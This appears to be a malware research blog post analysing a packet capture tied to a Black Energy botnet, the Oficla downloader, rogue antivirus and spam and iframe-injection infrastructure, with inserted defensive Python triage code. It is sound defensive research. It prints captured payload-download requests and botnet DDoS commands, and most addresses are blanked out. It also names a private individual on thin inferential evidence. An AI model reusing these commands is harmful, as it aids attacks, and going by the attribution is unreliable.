Russian Malware Bundle

by Nart Villeneuve

This Malware Lab blog post analyzes a packet capture file from an infected computer associated with a political figure. While evidence of compromise was found, the malware infection is most likely unrelated to political activities and was not a targeted attack. Rather, the infection is related to the criminal activities of attackers based in Russia or the Ukraine.

Key findings:

  • From the malware connections recorded in the packet capture file we were able to discover malware that bundled a Black Energy bot with the “Oficla/Sasfis” Trojan downloader as well as known rogue/fake anti-virus software.
  • We were able to access an interface to the Black Energy botnet that was not secured and observed the attackers conduct a brief DDoS attack.
  • Despite being a Russian botnet, many of the domain names were .cn and many IP addresses were Chinese.
  • This network is linked with an operation that spams nearly 4.3 million email addresses with gambling, pornography, pharmaceuticals, rogue AV software and other malware. It is also linked with an iframe injection campaign.


In 2008, Steven Adair of Shadowserver noted that the Black Energy botnet was moving beyond DDoS attacks into other areas of cybercrime.

Black Energy this year went from just DDOSing to spreading keyloggers to steal credentials and passwords, Adair says. Like other botnets, it has been updating itself with new malware.1

In fact, this appears to be the case for a variety of botnets. Dancho Danchev states that groups which used to specialize in DDoS attacks are “‘vertically integrating’ in order to occupy as many underground market segments as possible.”2

Another observation by Danchev, which is supported by this investigation, is that DDoS vendors attack non-political sites in order to avoid drawing attention to themselves. Danchev explains:

It’s also worth pointing out that a huge number of “boutique vendors” of DDoS services remain reluctant to initiate DDoS attacks against government or political parties, in an attempt to stay beneath the radar. This mentality prompted the inevitable development of “aggregate-and-forget” type of botnets exclusively aggregated for customer-tailored propositions who would inevitably get detected, shut down, but end up harder to trace back to the original source compared to a situation where they would be DDoSing the requested high-profile target from the very same botnet that is closely monitored by the security community.3

Instead, they focus on extortion schemes: charging for a protection racket (to not DDoS a web site) and encouraging “protected” sites to DDoS their competitors.

Now that various attacker groups have diversified, it is difficult to distinguish their activities from one another. Different groups propagate each other’s malware or use what FireEye calls a “BotnetWeb,” which is defined as:

A collection of heterogeneous Botnets being operated in conjunction with each other controlled by one or more closely linked cyber criminal group(s).4

Some of this may be the result of splintering among more established groups. The ThreatFire blog suggests that the Storm group has broken into several groups, some of which are now teaming up with rogue AVs.5 This realignment of criminal actors may partially explain the diversification of malware.

However, there also appears to be a significant role for “middlemen” who simply propagate content, whether it be advertisements, iframe injection, rogue AVs, or botnet software.

Packet Capture

The packet capture from the infected computer shows a variety of malware activity. While the activity may all be related, there appear to be several distinct types of malware involved.

The infected computer connected to four control servers:

  • ( – NEOWEB HOSTING, RU)
  • ( – China Netcom, CN)
  • ( – China Netcom, CN)
  • ( – China Netcom, CN)

The captured network traffic shows a connection from the infected computer to ( and a file “R23.exe” is downloaded.

GET /1/R23.exe HTTP/1.0

An automated analysis of “R23.exe” by ThreatExpert shows that connections are issued to ( and ( as well as ( However, the captured network traffic from the infected computer does not show any connections to (, IntTranspNet, RU).

Black Energy

Black Energy is a botnet toolkit whose primary functionality is Distributed Denial of Service (DDoS) attacks. The bots communicate with the command and control server over HTTP. It is used by Russian hackers, and Black Energy botnet kits can be purchased for about $40. There are at least 30 distinct Black Energy botnets.7 According to Arbor Networks, Black Energy botnets were used in the DDoS attack on Georgia in 2008.8

The captured network traffic from the infected computer does show a connection to ( which is a bot check-in:

POST /1/stat.php HTTP/1.0

HTTP/1.1 200 OK

The response from the C&C is base64 encoded; decoded, it reads:


Further analysis of the Black Energy control server at ( revealed the command interface that the attacker uses to issue commands to infected computers. According to the statistics in the interface the attackers had 2044 active bots, an average of 2418 per hour and 8105 per day. In total the attackers recorded 64346 infections.


Further investigation revealed that the command interface for another Black Energy control server on the same IP address, (, China Netcom), was also accessible. According to the statistics in the interface the attackers had 3623 active bots, an average of 4869 per hour and 12749 per day. In total the attackers recorded 51813 infections.


During the investigation the attackers began a DDoS attack against “” with the command:

flood http

The IP address is assigned to “Erix colocation and vps service” in Moscow, Russia and the only domain we found that resolved to this IP address is,, which appears to be a web site selling services to obtain Russian driver’s licenses. The command was changed back to “wait” shortly thereafter.


Several minutes later the following command was issued on both Black Energy control servers, which had a total of 5387 active bots at the time.

flood http index.html

We also observed both command and control servers issue additional DDoS commands:

flood http
flood http forum
flood http
flood http

(The version of Black Energy running on these servers appears to be 1.7 as new files introduced with Black Energy 1.8 do not appear on these servers.9)
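To make the check-in mechanics above concrete, here is an added example of my own (not code from the original post, and not the Black Energy kit’s own code) that base64-decodes captured C&C response bodies and sorts them into idle, DDoS and unknown commands so that a “flood http” instruction can be alerted on. The sample bodies are constructed; the command strings follow the forms quoted above (“wait”, “flood http <target>”), while the “<interval>;<command>” framing of the decoded text is an assumption of the example, not something the post documents.

```python
"""Decode and classify Black Energy-style C&C responses (added example).

The bots described in the post check in with an HTTP POST to stat.php and
receive a base64-encoded command body. The sample responses below are
CONSTRUCTED for this example; the "<interval>;<command>" framing is an
assumption, the command words ("wait", "flood http ...") are the ones the
post quotes.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample response bodies, already base64-encoded as a C&C would
# send them. "victim.example" is a placeholder, not a real target.
SAMPLE_RESPONSES = [
    base64.b64encode(b"10;wait").decode(),
    base64.b64encode(b"10;flood http victim.example").decode(),
    base64.b64encode(b"10;flood http victim.example/forum").decode(),
    "not*base64!!",  # malformed body: the classifier must not crash on it
]


@dataclass
class Command:
    raw: str                # decoded command text (framing stripped)
    kind: str               # "idle", "ddos" or "unknown"
    method: Optional[str]   # flood method, e.g. "http", for ddos commands
    target: Optional[str]   # flood target, if the command carries one


FLOOD_RE = re.compile(r"^flood\s+(\S+)\s*(.*)$")


def decode_body(body: str) -> Optional[str]:
    """Base64-decode a response body; return None if it is not valid base64."""
    try:
        return base64.b64decode(body, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None


def classify(decoded: str) -> Command:
    """Map a decoded command string onto a coarse category for alerting."""
    # Assumed "<interval>;<command>" framing; fall back to the whole string.
    cmd = decoded.split(";", 1)[1] if ";" in decoded else decoded
    cmd = cmd.strip()
    if cmd == "wait":
        return Command(cmd, "idle", None, None)
    m = FLOOD_RE.match(cmd)
    if m:
        return Command(cmd, "ddos", m.group(1), m.group(2) or None)
    return Command(cmd, "unknown", None, None)


def triage(bodies: List[str]) -> List[Tuple[str, Optional[Command]]]:
    """Decode every body and pair it with its Command (None if undecodable)."""
    out = []
    for b in bodies:
        decoded = decode_body(b)
        out.append((b, classify(decoded) if decoded is not None else None))
    return out


def ddos_targets(bodies: List[str]) -> List[str]:
    """The sorted set of flood targets seen across all responses."""
    return sorted({c.target for _, c in triage(bodies)
                   if c is not None and c.kind == "ddos" and c.target})


if __name__ == "__main__":
    for body, cmd in triage(SAMPLE_RESPONSES):
        print(body[:24].ljust(24), "->", cmd)
```

Run as a script it prints one classification per sample body; in a real workflow the bodies would come from a capture-parsing step that pairs each POST to stat.php with its HTTP response, and a “ddos” result with a target is the event worth alerting on.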


After the connection to, there was a connection to ( where the infected computer was directed to download “bot.exe” from (

GET /tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1 HTTP/1.1

HTTP/1.1 200 OK

An automated analysis of “bot.exe” shows that it connects to ( Follow-up requests to ( instructed the infected computer to “delay.”

GET /tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1&tid=43&r=1 HTTP/1.1

HTTP/1.1 200 OK

This behaviour is identical to Win32/Oficla, a trojan downloader.11 In this case the Oficla downloader instructs the infected computer to download “bot.exe,” which connects to the Black Energy control server.
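The two bb.php requests quoted above have a recognisable shape, and that shape is what a proxy-log or capture triage script can key on. The following is an added example of my own, not code from the original post: it parses request lines, picks out bb.php beacons by their parameter set, and separates the initial check-in from the later task report. The two bb.php lines are the ones quoted in the post; the remaining sample lines, the required-parameter rule and the reading of “tid”/“r” as a task report are assumptions inferred from those two requests, not something the post documents.

```python
"""Recognise Oficla/Sasfis-style downloader beacons in request lines (added example).

The bb.php request lines below are the two quoted in the post; the other
lines are CONSTRUCTED. The classification rules are assumptions drawn from
the shape of those two requests.
"""
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

REQUEST_LINES = [
    "GET /tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1 HTTP/1.1",
    "GET /tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1&tid=43&r=1 HTTP/1.1",
    "GET /1/R23.exe HTTP/1.0",                            # plain download
    "GET /toolbarprofit/images/body_bg_bot.jpg HTTP/1.0",  # unrelated request
    "GET /tmp/bb.php?x=1 HTTP/1.1",                       # constructed: same path, wrong shape
]

# Parameters present in both quoted beacons (assumption: all are required).
REQUIRED = {"id", "v", "tm", "b"}


def parse_request_line(line: str) -> Optional[Tuple[str, str, Dict[str, str]]]:
    """Split 'METHOD target HTTP/x.y' into (method, path, first-value query dict)."""
    parts = line.split()
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    method, target = parts[0], parts[1]
    u = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(u.query).items()}
    return method, u.path, query


def classify_beacon(line: str) -> Optional[Dict[str, Optional[str]]]:
    """Return a beacon record if the line looks like a bb.php check-in, else None."""
    parsed = parse_request_line(line)
    if parsed is None:
        return None
    method, path, q = parsed
    if method != "GET" or not path.endswith("/bb.php") or not REQUIRED.issubset(q):
        return None
    # Assumption: tid/r only appear once the bot reports on an assigned task.
    phase = "task-report" if {"tid", "r"}.issubset(q) else "check-in"
    return {
        "bot_id": q["id"],
        "version": q["v"],
        "campaign": q["b"],   # "DDOS1" in the quoted traffic
        "phase": phase,
        "task_id": q.get("tid"),
    }


def summarize(lines: List[str]) -> List[Dict[str, Optional[str]]]:
    """All beacon records found in a list of request lines, in order."""
    return [rec for rec in (classify_beacon(l) for l in lines) if rec is not None]


if __name__ == "__main__":
    for rec in summarize(REQUEST_LINES):
        print(rec)
```

The campaign tag (“b=DDOS1” here) is the most useful field to pivot on: it ties the downloader check-in to the payload it was staging, which in this capture was the Black Energy bot.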

Rogue AVs

The malware file “R23.exe,” which the original infected computer downloaded from (, connected to (, the Black Energy control server, (, the Oficla/Sasfis control server, as well as a URL associated with rogue/fake antivirus software.12


In fact, there were additional malware files in the same directory as “R23.exe” on ( including “8.exe,”13 “R31.exe”14 and “Windows_Protector.exe.”15 An analysis of “Windows_Protector.exe” showed that it downloaded another file named “PC_protect.exe” from (, NL-LEASEWEB, NL).16

This URL was found in hxxp:// “Windows_Protector.exe.” The file “x.exe”17 from (, DINETHOSTING, RU) connects to ( and begins an SSL encrypted session.

The files that were on ( were replaced with “Bee.dll,”18 “ked.exe,”19 “win2ext.exe,”20 and “Windows_Protector.exe.”21 The “win2ext.exe” file connected to (, E-Icann, China Netcom, CN) and (, Group Vertical Ltd, RU).


There were some connections, which appeared to be unrelated to the malware analyzed above, requesting “/toolbarprofit/images/body_bg_bot.jpg” from the IP address “” (Network Operations Center Inc., US) with the host header “” These connections are redirected to “” Software that connects to the IP address “” is under review by PrevX.22

GET /toolbarprofit/images/body_bg_bot.jpg HTTP/1.0

HTTP/1.1 301 Moved Permanently
Server: nginx

The domain “” resolves to “” and is an alias for “”

$ host is an alias for has address

Searches focused on “toolbarprofit” yielded an individual known as “rundll32” using the email address “” and the ICQ number “561194042.”


There is a post by “rundll32” that advertises an “affiliate” program that is “not detected by any antivirus.” In this post “rundll32” advertises the ICQ number “551802661” and the website “” The same text has been posted on a variety of Russian hacker forums.23


While resolves to (NL-LEASEWEB, NL), exhibits the same behaviour as

$ host is an alias for has address

Our investigation then focused on the email address, “”, which was used to register A search for “” returns a paper written by Alexander V. Prokhorov (or Prochorov), a student at Moscow State University, Russia.


The same search also returned a server that is being used for spam as well as iframe injection. In fact, “” appears on a large spam list of 4,288,450 email addresses. There were a variety of templates as well as tools for sending spam located on the server across the following domains, all of which are hosted on the same IP address (, HostRocket Web Services, US): and



In addition, we found a variety of redirects to various pornography sites as well as a pharmaceutical site,, and rogue AV sites. For example, the site, hxxp://, redirects to hxxp:// where the user is forced to download rogue AV software.24




We also found that some pages redirected users to “” which is hosted on the same IP address, (China Netcom, CN) as the Black Energy command and control servers and The connections to

GET /t/out.php HTTP/1.1

HTTP/1.x 302 Found

GET /sutra/in.cgi?default HTTP/1.1

HTTP/1.x 302 Found

GET /sutra/in.cgi?2 HTTP/1.1

HTTP/1.x 302 Found
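The three hops above (out.php, then in.cgi?default, then in.cgi?2, each answered with a 302) are the signature of a traffic distribution step in front of the final landing page. As an added example of my own, not code from the original post, the following reconstructs such a chain from captured transactions and reports how many hops went through the in.cgi redirector. The request paths mirror the ones quoted above; the host names, Location headers and landing page are constructed placeholders, since the post elides them.

```python
"""Reconstruct an HTTP redirect chain from captured transactions (added example).

The paths follow the /t/out.php -> /sutra/in.cgi?default -> /sutra/in.cgi?2
hops quoted in the post; host names, Location values and the landing page
are CONSTRUCTED placeholders (".invalid" is reserved and never resolves).
"""
from typing import Dict, List, Optional
from urllib.parse import urlsplit

Transaction = Dict[str, Optional[object]]

TRANSACTIONS: List[Transaction] = [
    {"url": "http://redirector.invalid/t/out.php", "status": 302,
     "location": "http://tds.invalid/sutra/in.cgi?default"},
    {"url": "http://tds.invalid/sutra/in.cgi?default", "status": 302,
     "location": "http://tds.invalid/sutra/in.cgi?2"},
    {"url": "http://tds.invalid/sutra/in.cgi?2", "status": 302,
     "location": "http://landing.invalid/scan/index.php"},
    {"url": "http://landing.invalid/scan/index.php", "status": 200,
     "location": None},
    {"url": "http://unrelated.invalid/favicon.ico", "status": 404,
     "location": None},
]


def index_by_url(transactions: List[Transaction]) -> Dict[str, Transaction]:
    """Map each requested URL to its transaction (first occurrence wins)."""
    by_url: Dict[str, Transaction] = {}
    for t in transactions:
        by_url.setdefault(str(t["url"]), t)
    return by_url


def follow_chain(start_url: str, transactions: List[Transaction],
                 max_hops: int = 10) -> List[str]:
    """Ordered URLs reached from start_url by following 3xx Location headers.

    Stops at a non-redirect response, an unknown URL, a repeated URL (loop
    guard: the repeated URL is appended once so the loop is visible) or after
    max_hops hops.
    """
    by_url = index_by_url(transactions)
    chain, seen, current = [start_url], {start_url}, start_url
    while len(chain) <= max_hops:
        t = by_url.get(current)
        if t is None or not (300 <= int(t["status"]) < 400) or not t["location"]:
            break
        nxt = str(t["location"])
        chain.append(nxt)
        if nxt in seen:
            break
        seen.add(nxt)
        current = nxt
    return chain


def looks_like_tds(url: str) -> bool:
    """Heuristic from the quoted chain: an in.cgi script under a sutra/ directory."""
    path = urlsplit(url).path
    return path.endswith("/in.cgi") and "/sutra/" in path


def chain_report(start_url: str, transactions: List[Transaction]) -> Dict[str, object]:
    """Summarise a chain: hop count, TDS hops, landing URL and hosts involved."""
    chain = follow_chain(start_url, transactions)
    return {
        "hops": len(chain) - 1,
        "tds_hops": sum(looks_like_tds(u) for u in chain),
        "landing": chain[-1],
        "hosts": sorted({urlsplit(u).netloc for u in chain}),
    }


if __name__ == "__main__":
    print(chain_report("http://redirector.invalid/t/out.php", TRANSACTIONS))
```

The landing URL and the set of hosts in the chain are what you would carry forward into blocking or pivoting; the in.cgi hops themselves change frequently and are a weaker indicator than the redirector host that fronts them.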

We also found a variety of malicious javascript and iframes that loaded the following URLs:

hxxp:// (, NETPLACE, RU)
hxxp:// (, Telos Solutions, NL)
hxxp:// (, eNom, US)

The domain, has been hosting “Windows_Protector.exe,” which is the rogue AV we also found on ( The domain, was found serving Zeus-related binaries from a Chinese IP address.26 All of these domain names appear to have been used in iframe injection attacks.

Additional searches reveal web sites that contained similar scripts and tools as those used on the domains listed above including, and


There was another connection of interest in our packet capture sample to “” (NETDIRECT-NET, DE) which is very similar to the connection between a Storm “supernode” and a “subcontroller” as described by SecureWorks’ Joe Stewart.29

POST /u/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Internet Explorer
Content-Length: 712
Pragma: no-cache


HTTP/1.1 200 OK
Date: Tue, 13 Oct 2009 08:30:16 GMT
Server: Apache/2.2.11 (FreeBSD) PHP/5.2.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.9
Content-Length: 28
Connection: close
Content-Type: text/html


According to Joe Stewart, the “master” control server is often protected by another nginx server. However, the server on appears to be Apache.

It is unclear if this is related to the malware “bundle” described in this post.







6 and




10 and

11 and


13 and

14 and

15 and

16 The IP address changed.

17 and



20 and


22 and

23 ,




27 When connecting directly to the requested file, a 403 response is received; however, when connecting with “” as the Host header, the browser is redirected to

28 and and


About Malware Lab

The Malware Lab ( is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.
